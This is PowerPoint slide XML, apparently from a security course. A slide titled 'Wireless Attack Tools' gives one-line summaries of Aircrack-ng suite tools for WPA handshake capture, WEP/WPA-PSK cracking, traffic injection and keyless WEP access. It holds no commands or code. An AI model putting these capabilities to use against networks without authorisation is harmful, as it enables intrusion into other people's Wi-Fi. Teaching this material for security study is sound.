              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" sz="3200" dirty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73" name="Oval 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7037550" y="2129696"/>
            <a:ext cx="923587" cy="923827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2" tIns="45711" rIns="91422" bIns="45711" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" sz="3200" dirty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76" name="Oval 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7037550" y="4521335"/>
            <a:ext cx="923587" cy="923827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2" tIns="45711" rIns="91422" bIns="45711" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" sz="3200" dirty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690710" y="3090272"/>
            <a:ext cx="1358028" cy="353925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algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="id-ID" sz="1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Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                <a:cs typeface="Lato Regular"/>
              </a:rPr>
              <a:t>Airbase-ng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62564" y="3396453"/>
            <a:ext cx="1991123" cy="738646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91422" tIns="45711" rIns="91422" bIns="45711" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="323785">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:ea typeface="MingLiU_HKSCS" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Lato Light"/>
              </a:rPr>
              <a:t>Captures WPA/WPA2 handshake and can act as an ad-hoc AP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3607242" y="3082104"/>
            <a:ext cx="1468571" cy="353925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algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="id-ID" sz="1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Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                <a:cs typeface="Lato Regular"/>
              </a:rPr>
              <a:t>Aircrack-ng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3125297" y="3396453"/>
            <a:ext cx="2409258" cy="523202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91422" tIns="45711" rIns="91422" bIns="45711" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="323785">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:ea typeface="MingLiU_HKSCS" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Lato Light"/>
              </a:rPr>
              <a:t>Defacto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:ea typeface="MingLiU_HKSCS" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Lato Light"/>
              </a:rPr>
              <a:t> WEP and WPA/WPA2-PSK cracking tool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6742398" y="3082104"/>
            <a:ext cx="1502747" cy="353925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algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="id-ID" sz="1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Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                <a:cs typeface="Lato Regular"/>
              </a:rPr>
              <a:t>Airdecap-ng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6157079" y="3396453"/>
            <a:ext cx="2650184" cy="954089"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91422" tIns="45711" rIns="91422" bIns="45711" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="323785">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:ea typeface="MingLiU_HKSCS" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Lato Light"/>
              </a:rPr>
              <a:t>Decrypts WEP/WPA/ WPA2 and can be used to strip the wireless headers from Wi-Fi packets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9754560" y="3092339"/>
            <a:ext cx="1488321" cy="353925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algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="id-ID" sz="1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Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                <a:cs typeface="Lato Regular"/>
              </a:rPr>
              <a:t>Airgraph-ng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9283588" y="3396453"/>
            <a:ext cx="2603612" cy="738646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91422" tIns="45711" rIns="91422" bIns="45711" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="323785">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:ea typeface="MingLiU_HKSCS" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Lato Light"/>
              </a:rPr>
              <a:t>Creates client-to-AP relationship and common probe graph from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:ea typeface="MingLiU_HKSCS" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Lato Light"/>
              </a:rPr>
              <a:t>airodump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:ea typeface="MingLiU_HKSCS" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Lato Light"/>
              </a:rPr>
              <a:t> file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694614" y="5416755"/>
            <a:ext cx="1348026" cy="353925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algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="id-ID" sz="1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Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                <a:cs typeface="Lato Regular"/>
              </a:rPr>
              <a:t>Airmon-ng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152400" y="5751511"/>
            <a:ext cx="2409258" cy="738646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91422" tIns="45711" rIns="91422" bIns="45711" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="323785">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:ea typeface="MingLiU_HKSCS" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Lato Light"/>
              </a:rPr>
              <a:t>Used to enable monitor mode on wireless interfaces from managed mode and vice versa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3731851" y="5408588"/>
            <a:ext cx="1217156" cy="353925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algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="id-ID" sz="1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Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                <a:cs typeface="Lato Regular"/>
              </a:rPr>
              <a:t>Airtun-ng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2871228" y="5751511"/>
            <a:ext cx="2915202" cy="954089"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91422" tIns="45711" rIns="91422" bIns="45711" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="323785">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:ea typeface="MingLiU_HKSCS" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Lato Light"/>
              </a:rPr>
              <a:t>Creates a virtual tunnel interface to monitor encrypted traffic and inject arbitrary traffic into a network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6810454" y="5408588"/>
            <a:ext cx="1364440" cy="353925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algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="id-ID" sz="1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Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                <a:cs typeface="Lato Regular"/>
              </a:rPr>
              <a:t>Easside-ng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6276445" y="5751511"/>
            <a:ext cx="2409258" cy="738646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91422" tIns="45711" rIns="91422" bIns="45711" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="323785">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:ea typeface="MingLiU_HKSCS" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Lato Light"/>
              </a:rPr>
              <a:t>Enables communication via a WEP-encrypted AP without the knowledge of the WEP key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9591952" y="5418823"/>
            <a:ext cx="1813537" cy="353925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algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="id-ID" sz="1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Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                <a:cs typeface="Lato Regular"/>
              </a:rPr>
              <a:t>Packetforge-ng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9282491" y="5751511"/>
            <a:ext cx="2409258" cy="738646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91422" tIns="45711" rIns="91422" bIns="45711" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="323785">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:ea typeface="MingLiU_HKSCS" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Lato Light"/>
              </a:rPr>
              <a:t>Used to create encrypted packets that can subsequently be used for injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Freeform 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F7EF540-3A47-492E-A3DF-B630CCCBF4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976546"/>
            <a:ext cx="11716290" cy="982705"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 6600 w 7287"/>
              <a:gd name="T1" fmla="*/ 1896 h 1897"/>
              <a:gd name="T2" fmla="*/ 7286 w 7287"/>
              <a:gd name="T3" fmla="*/ 950 h 1897"/>
              <a:gd name="T4" fmla="*/ 6600 w 7287"/>
              <a:gd name="T5" fmla="*/ 0 h 1897"/>
              <a:gd name="T6" fmla="*/ 0 w 7287"/>
              <a:gd name="T7" fmla="*/ 0 h 1897"/>
              <a:gd name="T8" fmla="*/ 0 w 7287"/>
              <a:gd name="T9" fmla="*/ 1896 h 1897"/>
              <a:gd name="T10" fmla="*/ 6600 w 7287"/>
              <a:gd name="T11" fmla="*/ 1896 h 18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287" h="1897">
                <a:moveTo>
                  <a:pt x="6600" y="1896"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7286" y="950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6600" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6600" y="1896"/>
                </a:lnTo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197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146ECC05-5FEA-43BD-BD09-AFC39A3D0312}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8756280" y="1689713"/>
            <a:ext cx="1914627" cy="276999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http://www.aircrack-ng.org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AB1109FB-2D3E-4821-82AD-BBAE6D8D135E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1161129"/>
            <a:ext cx="1605729" cy="61555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r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Aircrack-ng Suite</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1700" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Title 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D791F65-022B-4D66-BC45-A43F7098B749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="158750"/>
            <a:ext cx="9909175" cy="58578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3600" b="1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Wireless Attack Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" b="1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</a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Round Same Side Corner Rectangle 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{454E32D9-887F-41E5-A073-495D970F71FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="1837774" y="1036970"/>
            <a:ext cx="109697" cy="91359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9419" tIns="109710" rIns="219419" bIns="109710" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="bg-BG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Lato Light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071E7FEA-2B5D-4D20-9CA5-39E90D86275F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029408" y="1028370"/>
            <a:ext cx="7764297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Aircrack-ng is a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network software suite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consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker, and an analysis tool for 802.11 wireless networks; the program runs in Linux and Windows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2712084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Placeholder 4" descr="A picture containing water sport, swimming&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8CB53F7-EF92-45DD-B713-FF9BB144FBBB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227" r="33227"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8154988" y="0"/>
            <a:ext cx="4037012" cy="6556514"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="AutoShape 4070">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61E9955A-D7EA-41B1-93D7-BAA7C24F2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8847" y="2364633"/>
            <a:ext cx="5804647" cy="1832821"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0C2F3A"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none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sng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굴림" pitchFamily="34" charset="-127"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-127"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="AutoShape 4070">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83133862-34D4-4D37-9DE8-DE9B48AE30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0" y="121"/>
            <a:ext cx="2019717" cy="2189607"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="10000"/>
              <a:lumOff val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none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sng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굴림" pitchFamily="34" charset="-127"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-127"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="AutoShape 4070">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{087415B9-1594-4649-954D-0AB9B32BC0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122" y="10864"/>
            <a:ext cx="2019717" cy="2189607"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="10000"/>
              <a:lumOff val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none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sng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굴림" pitchFamily="34" charset="-127"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-127"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="AutoShape 4070">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{306842B6-96FE-4E75-95E8-F7CD49F7F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7573" y="9416"/>
            <a:ext cx="2019717" cy="2189607"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="10000"/>
              <a:lumOff val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none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sng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굴림" pitchFamily="34" charset="-127"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-127"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="AutoShape 4070">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{183F916F-7839-473C-AB01-B31625873C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0" y="2175813"/>
            <a:ext cx="2019717" cy="2189607"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="10000"/>
              <a:lumOff val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none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sng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굴림" pitchFamily="34" charset="-127"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-127"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="AutoShape 4070">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C6B4020-E56D-4E82-BB13-95EA8CCBFC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912" y="4376163"/>
            <a:ext cx="2019717" cy="2189607"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="10000"/>
              <a:lumOff val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none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sng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굴림" pitchFamily="34" charset="-127"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-127"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="AutoShape 4070">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11BE4340-501D-4E7E-916D-0A828DA8BF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9363" y="4376163"/>
            <a:ext cx="2019717" cy="2189607"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="10000"/>
              <a:lumOff val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none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sng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굴림" pitchFamily="34" charset="-127"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-127"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="AutoShape 4070">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EFD1C24-D3B5-4F66-B982-7067ABCA90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93071" y="4361480"/>
            <a:ext cx="2019717" cy="2189607"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="10000"/>
              <a:lumOff val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none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sng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굴림" pitchFamily="34" charset="-127"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-127"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="AutoShape 4070">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37245385-FDBA-4198-B8EC-0698D520DD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0537" y="17202"/>
            <a:ext cx="2019717" cy="2189607"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="10000"/>
              <a:lumOff val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none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sng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굴림" pitchFamily="34" charset="-127"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-127"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="AutoShape 4070">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
